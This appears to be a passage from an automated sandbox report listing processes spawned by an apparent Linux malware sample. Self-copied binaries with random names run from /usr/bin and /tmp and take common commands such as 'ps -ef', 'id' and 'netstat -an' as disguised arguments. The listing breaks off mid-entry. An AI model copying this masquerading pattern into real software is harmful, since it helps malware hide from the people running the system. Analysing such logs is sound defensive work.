                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:31
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:/usr/bin/wrfeamwlub "ifconfig eth0" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:/usr/bin/wrfeamwlub id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wrfeamwlub
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:2cc8aeffc8af7addf44cb78168298206

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:/usr/bin/wgpgdetjwe "ps -ef" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:/usr/bin/wgpgdetjwe whoami 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:/usr/bin/wgpgdetjwe "ifconfig eth0" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:/usr/bin/wgpgdetjwe "grep \"A\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:/usr/bin/wgpgdetjwe "route -n" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:37
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/wgpgdetjwe
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a23fddceeec8b0b1803afa96b34f57de

                                                            Start time:09:48:42
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:42
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:42
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:/usr/bin/zyapsjpaje su 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:42
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:/usr/bin/zyapsjpaje "ps -ef" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:/usr/bin/zyapsjpaje bash 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:/usr/bin/zyapsjpaje ls 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:/usr/bin/zyapsjpaje "echo \"find\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zyapsjpaje
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e6a731eab67241eef92d9748fd128432

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:/usr/bin/yfiimchuiz id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:/usr/bin/yfiimchuiz pwd 9446
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:/usr/bin/yfiimchuiz pwd 9446
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:/usr/bin/yfiimchuiz id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:/usr/bin/yfiimchuiz gnome-terminal 9446
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:48
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/yfiimchuiz
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:799bae277cbb415227a0100b46398b8f

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:/usr/bin/txflbjqefg "sleep 1" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:/usr/bin/txflbjqefg top 9446
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:/usr/bin/txflbjqefg gnome-terminal 9446
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:/usr/bin/txflbjqefg "ls -la" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:/usr/bin/txflbjqefg "ps -ef" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:54
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/txflbjqefg
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:75e59fa1a4720187f898957348fda126

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:/usr/bin/qjfxtxsijs ifconfig 9446
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:/usr/bin/qjfxtxsijs "route -n" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:/usr/bin/qjfxtxsijs pwd 9446
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:/usr/bin/qjfxtxsijs id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:48:59
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:49:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:00
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:/usr/bin/qjfxtxsijs "cat resolv.conf" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:49:00
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/qjfxtxsijs
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:446f97ee9842b394ed1a50fe59b5c7d8

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:/usr/bin/tudlcvpgbc "netstat -an" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:/usr/bin/tudlcvpgbc id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:/usr/bin/tudlcvpgbc "sleep 1" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:/usr/bin/tudlcvpgbc "route -n" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:/usr/bin/tudlcvpgbc "ls -la" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:05
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/tudlcvpgbc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:e9f6680f4483fb8bc5fb7e9e55222bd7

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
